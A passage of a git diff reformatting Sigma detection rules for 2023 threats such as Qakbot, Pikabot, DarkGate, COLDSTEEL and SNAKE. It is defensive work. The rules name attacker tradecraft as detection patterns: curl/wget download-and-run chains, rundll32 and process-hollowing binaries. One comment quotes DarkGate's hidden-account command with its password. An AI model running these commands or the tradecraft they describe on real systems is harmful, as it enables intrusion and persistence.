https://wildptr.io/winrar-cve-2023-40477-poc-new-vulnerability-winrar-security-research/ - https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC @@ -24,6 +23,7 @@ detection: EventID: 1000 AppName: WinRAR.exe filter_main_fixed_version: + # TODO: fix this when the "lt" modifier is implemented for software versions AppVersion|startswith: - 6.23. - 6.24. diff --git a/sigma/builtin/emerging-threats/2023/Exploits/win_msmq_corrupted_packet.yml b/sigma/builtin/emerging-threats/2023/Exploits/win_msmq_corrupted_packet.yml index a9aecc277..16ef41993 100644 --- a/sigma/builtin/emerging-threats/2023/Exploits/win_msmq_corrupted_packet.yml +++ b/sigma/builtin/emerging-threats/2023/Exploits/win_msmq_corrupted_packet.yml @@ -1,8 +1,7 @@ title: MSMQ Corrupted Packet Encountered id: ae94b10d-fee9-4767-82bb-439b309d5a27 status: experimental -description: Detects corrupted packets sent to the MSMQ service. Could potentially - be a sign of CVE-2023-21554 exploitation +description: Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation references: - https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml b/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml index d2e67ad8c..e9e6fcf11 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml @@ -1,8 +1,7 @@ title: COLDSTEEL RAT Anonymous User Process Execution id: e01b6eb5-1eb4-4465-a165-85d40d874add status: experimental -description: Detects the creation of a process executing as user called "ANONYMOUS" - seen used by the "MileStone2016" variant of COLDSTEEL +description: Detects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml b/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml index 201d5022e..b5c42591e 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml @@ -1,8 +1,7 @@ title: COLDSTEEL RAT Service Persistence Execution id: 9f9cd389-cea0-4142-bf1a-a3fd424abedd status: experimental -description: Detects the creation of an "svchost" process with specific command line - flags, that were seen present and used by ColdSteel RAT +description: Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf author: X__Junior (Nextron Systems) @@ -19,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|endswith: + CommandLine|endswith: - ' -k msupdate' - ' -k msupdate2' - ' -k alg' - NewProcessName|endswith: \svchost.exe + NewProcessName|endswith: \svchost.exe condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml b/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml index 3d9d4a9cf..621561baf 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml @@ -1,8 +1,7 @@ title: Potential COLDSTEEL RAT Windows User Creation id: 95214813-4c7a-4a50-921b-ee5c538e1d16 status: experimental -description: Detects creation of a new user profile with a specific username, seen - being used by some variants of the COLDSTEEL RAT. +description: Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT. references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/win_system_malware_coldsteel_persistence_service.yml b/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/win_system_malware_coldsteel_persistence_service.yml index 68b8ab5c6..a1e270191 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/win_system_malware_coldsteel_persistence_service.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/win_system_malware_coldsteel_persistence_service.yml @@ -1,8 +1,7 @@ title: COLDSTEEL Persistence Service Creation id: 3ced239c-7285-4b54-99c4-8525b69293f7 status: test -description: Detects the creation of new services potentially related to COLDSTEEL - RAT +description: Detects the creation of new services potentially related to COLDSTEEL RAT references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml b/sigma/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml index d575aab94..befa6a640 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml @@ -1,15 +1,10 @@ title: DarkGate - Autoit3.EXE Execution Parameters id: f8e9aa1c-14f2-4dbd-aa59-b98968ed650d status: experimental -description: 'Detects execution of the legitimate Autoit3 utility from a suspicious - parent process. AutoIt3.exe is used within - - the DarkGate infection chain to execute shellcode that performs process injection - and connects to the DarkGate - +description: | + Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within + the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate command-and-control server. - - ' references: - https://github.security.telekom.com/2023/08/darkgate-loader.html - https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware @@ -28,15 +23,15 @@ detection: EventID: 4688 Channel: Security selection_proc: - - NewProcessName|endswith: \Autoit3.exe - - OriginalFileName: AutoIt3.exe + - NewProcessName|endswith: \Autoit3.exe + - OriginalFileName: AutoIt3.exe selection_parent: ParentProcessName|endswith: - \cmd.exe - \KeyScramblerLogon.exe - \msiexec.exe filter_main_legit_autoit_location: - NewProcessName|endswith: + NewProcessName|endswith: - :\Program Files (x86)\AutoIt3\AutoIt3.exe - :\Program Files\AutoIt3\AutoIt3.exe condition: process_creation and (all of selection_* and not 1 of filter_main_*) diff --git a/sigma/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml b/sigma/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml index e205aed86..5cc0bceca 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml @@ -1,8 +1,7 @@ title: DarkGate - User Created Via Net.EXE id: bf906d7b-7070-4642-8383-e404cf26eba5 status: experimental -description: Detects creation of local users via the net.exe command with the name - of "DarkGate" +description: Detects creation of local users via the net.exe command with the name of "DarkGate" references: - Internal Research author: X__Junior (Nextron Systems) @@ -16,16 +15,17 @@ logsource: category: process_creation product: windows detection: + # /c net user /add SafeMode DarkGate0! process_creation: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - user - add - DarkGate - SafeMode - NewProcessName|endswith: + NewProcessName|endswith: - \net.exe - \net1.exe condition: process_creation and selection diff --git a/sigma/builtin/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml b/sigma/builtin/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml index 9d8ee4472..309d7c208 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml @@ -1,8 +1,7 @@ title: Griffon Malware Attack Pattern id: bcc6f179-11cd-4111-a9a6-0fab68515cf7 status: experimental -description: Detects process execution patterns related to Griffon malware as reported - by Kaspersky +description: Detects process execution patterns related to Griffon malware as reported by Kaspersky references: - https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/ author: Nasreddine Bencherchali (Nextron Systems) @@ -18,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \local\temp\ - //b /e:jscript - .txt diff --git a/sigma/builtin/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml b/sigma/builtin/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml index 910bd1b94..b787c5815 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml @@ -1,9 +1,7 @@ title: IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32 id: 2bd8e100-5b3b-4b6a-bbb5-b129d3ddddc5 status: experimental -description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with - the export function "DllRegisterServer". This behaviour was often seen used by - malware and especially IcedID +description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID references: - https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/ - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ @@ -21,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|endswith: - - \1.dll, DllRegisterServer - - ' 1.dll, DllRegisterServer' - NewProcessName|endswith: \rundll32.exe + CommandLine|endswith: + - \1.dll, DllRegisterServer # In case of full path exec + - ' 1.dll, DllRegisterServer' # In case of direct exec + NewProcessName|endswith: \rundll32.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml b/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml index d7302dc56..eb0b05b05 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml @@ -1,18 +1,10 @@ title: Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE id: e5144106-8198-4f6e-bfc2-0a551cc8dd94 status: experimental -description: 'Detects the execution of concatenated commands via "cmd.exe". Pikabot - often executes a combination of multiple commands via the command handler "cmd - /c" in order to download and execute additional payloads. - - Commands such as "curl", "wget" in order to download extra payloads. "ping" and - "timeout" are abused to introduce delays in the command execution and "Rundll32" - is also used to execute malicious DLL files. - - In the observed Pikabot infections, a combination of the commands described above - are used to orchestrate the download and execution of malicious DLL files. - - ' +description: | + Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. + Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files. + In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files. references: - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_30.10.2023.txt - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_22.12.2023.txt @@ -32,21 +24,21 @@ detection: EventID: 4688 Channel: Security selection_cmd: - CommandLine|contains|all: + CommandLine|contains|all: - cmd - /c selection_pipes: - CommandLine|contains: + CommandLine|contains: - ' & ' - ' || ' selection_commands_1: - CommandLine|contains: + CommandLine|contains: - ' curl' - ' wget' - ' timeout ' - ' ping ' selection_commands_2: - CommandLine|contains: + CommandLine|contains: - ' rundll32' - ' mkdir ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml b/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml index a2d762771..ef3cd6a8a 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml @@ -1,13 +1,9 @@ title: Potential Pikabot Discovery Activity - Suspicious Process Created By Rundll32.EXE id: 698d4431-514f-4c82-af4d-cf573872a9f5 status: experimental -description: 'Detects the execution of rundll32 that leads to system discovery activity, - such as incl. network, user info and domain groups. - - The malware Pikabot has been seen to use this technique as part of its C2-botnet - registration with a short collection time frame (less than 1 minute). - - ' +description: | + Detects the execution of rundll32 that leads to system discovery activity, such as incl. network, user info and domain groups. + The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute). references: - https://www.virustotal.com/gui/file/72f1a5476a845ea02344c9b7edecfe399f64b52409229edaf856fcb9535e3242 author: Andreas Braathen (mnemonic.io) @@ -21,16 +17,15 @@ tags: logsource: product: windows category: process_creation - definition: 'Requirements: By default the process_creation type event might not - contain the GrandParentImage. Make sure you collect such fields in order to - use this rule' + definition: 'Requirements: By default the process_creation type event might not contain the GrandParentImage. Make sure you collect such fields in order to use this rule' detection: process_creation: EventID: 4688 Channel: Security selection: GrandParentImage|endswith: \rundll32.exe - CommandLine: + CommandLine: + # Note: Only add strings as seen used by Pikabot to avoid collision with other strains of malware - ipconfig.exe /all - netstat.exe -aon - whoami.exe /all diff --git a/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml b/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml index 0ea95dcd8..61cb4db93 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml @@ -1,13 +1,9 @@ title: Potential Pikabot Hollowing Activity - Suspicious Process Created By Rundll32.EXE id: d8937fe7-42d5-4b4d-8178-e089c908f63f status: experimental -description: 'Detects the execution of rundll32 that leads to the invocation of legitimate - Windows binaries. - - The malware Pikabot has been seen to use this technique for process hollowing - through hard-coded Windows binaries - - ' +description: | + Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries. + The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries references: - https://www.virustotal.com/gui/file/b6e8910fb9b3bb1fcddefd35ff0ed8624930d30d6977e11808c8330415685a62 author: Andreas Braathen (mnemonic.io) @@ -25,14 +21,15 @@ detection: Channel: Security selection: ParentProcessName|endswith: \rundll32.exe - NewProcessName|endswith: + NewProcessName|endswith: + # Note: Only add processes seen used by Pikabot to avoid collision with other strains of malware - \searchprotocolhost.exe - \sndvol.exe - \wermgr.exe - \wwahost.exe filter_main_legit_sndvol: ParentCommandLine|contains: mmsys.cpl - NewProcessName|endswith: \sndvol.exe + NewProcessName|endswith: \sndvol.exe condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml b/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml index 4e50489cb..b4e75b47d 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml @@ -1,9 +1,7 @@ title: Qakbot Regsvr32 Calc Pattern id: 0033cf83-fb87-446d-9cac-43d63ad4d5a9 status: experimental -description: Detects a specific command line of "regsvr32" where the "calc" keyword - is used in conjunction with the "/s" flag. This behavior is often seen used by - Qakbot +description: Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot references: - https://github.com/pr0xylife/Qakbot/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' /s' - ' -s' - CommandLine|endswith: ' calc' - NewProcessName|endswith: \regsvr32.exe + CommandLine|endswith: ' calc' + NewProcessName|endswith: \regsvr32.exe condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml b/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml index 4777ee469..13805359e 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml @@ -1,8 +1,7 @@ title: Potential Qakbot Rundll32 Execution id: cf879ffb-793a-4753-9a14-bc8f37cc90df status: experimental -description: Detects specific process tree behavior of a "rundll32" execution often - linked with potential Qakbot activity. +description: Detects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity. references: - https://github.com/pr0xylife/Qakbot/ author: X__Junior (Nextron Systems) @@ -19,12 +18,14 @@ detection: EventID: 4688 Channel: Security selection_paths: - CommandLine|contains: + CommandLine|contains: + # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware - :\ProgramData\ - :\Users\Public\ - \AppData\Local\Temp\ - \AppData\Roaming\ ParentProcessName|endswith: + # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware - \cmd.exe - \cscript.exe - \curl.exe @@ -32,9 +33,9 @@ detection: - \powershell.exe - \pwsh.exe - \wscript.exe - NewProcessName|endswith: \rundll32.exe + NewProcessName|endswith: \rundll32.exe selection_extension: - CommandLine|contains: .dll + CommandLine|contains: .dll condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml b/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml index 3d44919ff..d72dabfc0 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml @@ -1,8 +1,7 @@ title: Qakbot Rundll32 Exports Execution id: 339ed3d6-5490-46d0-96a7-8abe33078f58 status: experimental -description: Detects specific process tree behavior of a "rundll32" execution with - exports linked with Qakbot activity. +description: Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity. references: - https://github.com/pr0xylife/Qakbot/ author: X__Junior (Nextron Systems) @@ -20,12 +19,14 @@ detection: EventID: 4688 Channel: Security selection_paths: - CommandLine|contains: + CommandLine|contains: + # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware - :\ProgramData\ - :\Users\Public\ - \AppData\Local\Temp\ - \AppData\Roaming\ ParentProcessName|endswith: + # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware - \cmd.exe - \cscript.exe - \curl.exe @@ -33,10 +34,11 @@ detection: - \powershell.exe - \pwsh.exe - \wscript.exe - NewProcessName|endswith: \rundll32.exe + NewProcessName|endswith: \rundll32.exe selection_exports: - CommandLine|endswith: - - aslr + CommandLine|endswith: + # Note: Only add additional exports seen used by Qakbot + - aslr # https://tria.ge/230524-scgq9add9v/behavioral1#report - bind - DrawThemeIcon - GG10 @@ -46,7 +48,7 @@ detection: - LS88 - Motd - N115 - - next + - next # https://tria.ge/230530-n3rxpahf9w/behavioral2 - Nikn - print - qqqb diff --git a/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml b/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml index eac11a69c..854e6d612 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml @@ -1,9 +1,7 @@ title: Qakbot Rundll32 Fake DLL Extension Execution id: bfd34392-c591-4009-b938-9fd985a28b85 status: experimental -description: Detects specific process tree behavior of a "rundll32" execution where - the DLL doesn't have the ".dll" extension. This is often linked with potential - Qakbot activity. +description: Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity. references: - https://github.com/pr0xylife/Qakbot/ author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) @@ -20,12 +18,14 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware - :\ProgramData\ - :\Users\Public\ - \AppData\Local\Temp\ - \AppData\Roaming\ ParentProcessName|endswith: + # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware - \cmd.exe - \cscript.exe - \curl.exe @@ -33,9 +33,9 @@ detection: - \powershell.exe - \pwsh.exe - \wscript.exe - NewProcessName|endswith: \rundll32.exe + NewProcessName|endswith: \rundll32.exe filter_main_extension: - CommandLine|contains: .dll + CommandLine|contains: .dll condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml b/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml index 2447db218..af3fa3ddc 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml @@ -1,8 +1,7 @@ title: Qakbot Uninstaller Execution id: bc309b7a-3c29-4937-a4a3-e232473f9168 status: experimental -description: Detects the execution of the Qakbot uninstaller file mentioned in the - USAO-CDCA document on the disruption of the Qakbot malware and botnet +description: Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet references: - https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources - https://www.virustotal.com/gui/file/7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117/community @@ -21,13 +20,13 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \QbotUninstall.exe - - Hashes|contains: - - IMPHASH=E772C815072311D6FB8C3390743E6BE5 - - SHA256=423A9D13D410E2DC38EABB9FDF3121D2072472D0426260283A638B822DCD5180 - - SHA256=559CAE635F0D870652B9482EF436B31D4BB1A5A0F51750836F328D749291D0B6 - - SHA256=855EB5481F77DDE5AD8FA6E9D953D4AEBC280DDDF9461144B16ED62817CC5071 - - SHA256=FAB408536AA37C4ABC8BE97AB9C1F86CB33B63923D423FDC2859EB9D63FA8EA0 + - NewProcessName|endswith: \QbotUninstall.exe + - Hashes|contains: + - IMPHASH=E772C815072311D6FB8C3390743E6BE5 + - SHA256=423A9D13D410E2DC38EABB9FDF3121D2072472D0426260283A638B822DCD5180 + - SHA256=559CAE635F0D870652B9482EF436B31D4BB1A5A0F51750836F328D749291D0B6 + - SHA256=855EB5481F77DDE5AD8FA6E9D953D4AEBC280DDDF9461144B16ED62817CC5071 + - SHA256=FAB408536AA37C4ABC8BE97AB9C1F86CB33B63923D423FDC2859EB9D63FA8EA0 condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml b/sigma/builtin/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml index c06ab54df..9bed93d19 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml @@ -1,9 +1,7 @@ title: Rhadamanthys Stealer Module Launch Via Rundll32.EXE id: 5cdbc2e8-86dd-43df-9a1a-200d4745fba5 status: test -description: Detects the use of Rundll32 to launch an NSIS module that serves as the - main stealer capability of Rhadamanthys infostealer, as observed in reports and - samples in early 2023 +description: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023 references: - https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88 - https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ @@ -24,12 +22,12 @@ detection: EventID: 4688 Channel: Security selection_rundll32: - - OriginalFileName: RUNDLL32.EXE - - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe selection_dll: - CommandLine|contains: nsis_uns + CommandLine|contains: nsis_uns selection_export_function: - CommandLine|contains: PrintUIEntry + CommandLine|contains: PrintUIEntry condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml b/sigma/builtin/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml index b5344a5b9..370c7e1e5 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml @@ -21,8 +21,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: '11111111' - NewProcessName|endswith: + CommandLine|contains: '11111111' + NewProcessName|endswith: - \bcdedit.exe - \net.exe - \net1.exe diff --git a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml index 268cd7b88..7d35a7cf4 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml @@ -1,8 +1,7 @@ title: Potential SNAKE Malware Installation CLI Arguments Indicator id: 02cbc035-b390-49fe-a9ff-3bb402c826db status: experimental -description: Detects a specific command line arguments sequence seen used by SNAKE - malware during its installation as described by CISA in their report +description: Detects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) @@ -18,7 +17,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|re: \s[a-fA-F0-9]{64}\s[a-fA-F0-9]{16} + # This CLI regex is based on the following description from the report: + # The jpsetup.exe installer requires two arguments to be passed via the command line for execution + # The first argument is a wide character string hashed with SHA-256 twice -> We assume that the first argument is of length SHA256 + # The AES initialization vector (IV) consists of the first 16 bytes of the second argument to jpsetup.exe -> We assume that the second argument is of at least 16 bytes (16 characters) + CommandLine|re: \s[a-fA-F0-9]{64}\s[a-fA-F0-9]{16} condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml index 5af8cc754..667f4e15a 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml @@ -1,8 +1,7 @@ title: Potential SNAKE Malware Installation Binary Indicator id: d91ff53f-fd0c-419d-a6b8-ae038d5c3733 status: experimental -description: Detects a specific binary name seen used by SNAKE malware during its - installation as described by CISA in their report +description: Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report references: - 